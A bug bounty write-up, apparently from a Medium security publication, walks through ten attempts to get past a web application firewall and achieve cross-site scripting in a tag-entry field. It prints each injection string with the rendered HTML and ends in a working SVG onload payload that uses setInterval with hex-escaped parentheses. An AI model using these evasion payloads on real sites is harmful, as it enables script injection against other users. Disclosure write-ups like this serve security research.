JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF:

Ak1T4
Ak1T4
Dec 27, 2017 · 4 min read

This is a quick write up for a waf bypass on a private bbp, so i will keep hidden the name of the program.

Looking around in the app i found an entry tag feature point which call my attention:

So the app basically load a tag item, i start with this:

### FIRST ATTEMPT:

injection: “=””’><details open=“”>

output is :

<span>”=””’&gt;&lt;details open=””&gt; (0)</span>

Nothing…

### SECOND ATTEMPT

injection: “=””’></><details open=“”>

output is:

<span>”=””’&gt;&lt;/&gt;&lt;details open=””&gt; (0)</span>

Nothing…

### THIRD ATTEMPT:

injection: “=””’></><script></script><details open=“”>

output is :

<span>”=””’&gt;<details open=”…” (0)<=”” span=””><a href=”” class=”” rel=”1"></a></details></span>

bam! we got HTML INJECTION!

NOW … GOING FOR THE PRECIOUS XSS…

#### FOURTH ATTEMPT:

i change the details tag for svg,

injection:“=””’></><script></script><svg onload=alert(1)>

output is :

<span>”=””’&gt;<svg onload=”al…” (1)=””> </svg></span>

strange? yes.. like hell.. with that ugly dots in the DOM too… (tag is working ok like shows above with details tag)

but no popup :(

#### FIFTH ATTEMPT:

injection:“=””’></><script></script><svg onload”=”alert(1)>

output is:

<svg onload”=”… (1)> </span><a href=” “=”” class=”” rel=”1"></svg>

WTF? are you kidding me?

wat?

ok ugly motherfucker… now this is personal..

#### SIXTH ATTEMPT:

injection:“=””’></><script></script><svg onload”=””alertonload=alert(1)””>

output is:

<span>”=””’&gt;<svg onload”=”… (1)” “=””> </svg></span>

ok i give up.. this is not working..

### SEVENTH ATTEMPT:

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt(1)>

output is:

onload=”prompt</span”><a href=”” class=”” rel=”0"></a></svg></span>

oh nice shit! i’m closer.. i can feel it..

i can fell your energy.. ak1t4..

#### EIGHTH ATTEMPT:

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`1`>

output is :

<svg onload”…=”” (1)””=”” onload=”prompt`1`”> </svg> :)

BOOM! WE GOT XSS!

OK.. NOW TRY WITH document.domain:

#### NINTH ATTEMPT:

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`document.domain`>

output is: <svg onload”…=”” (1)””=”” onload=”prompt`document.domain`”> </svg> :(

WTF? sticky shits are taken the input as string…

mmm IS TIME TO CALL A REAL JEDI : MASTER BRUTE COMES TO RESCUE AND BRINGS BALANCE TO THE FORCE..

So i ask him how inject document.domain over sticky shits `1`;

his reply was:

#### FINAL ATTEMPT with the magic touch of master brute :)

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=setInterval`alert\x28document.domain\x29`

BOOM BABY!

*THANKS TO MASTER BRUTELOGIC for GUIDE ME TO THE FINAL DESTINY :)

XSS are not my field so i feel like:

May the force be with you — happy hacking :)

P.D: I’m not coder , i hack by common and logical sense. All critics are welcome always for improve. I hope you are enjoyed this lecture as i enjoyed writing.

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Ak1T4

Written by

Ak1T4

WhiteHat Hacker Zen Monk & Bounty Hunter

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Ak1T4

Written by

Ak1T4

WhiteHat Hacker Zen Monk & Bounty Hunter

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store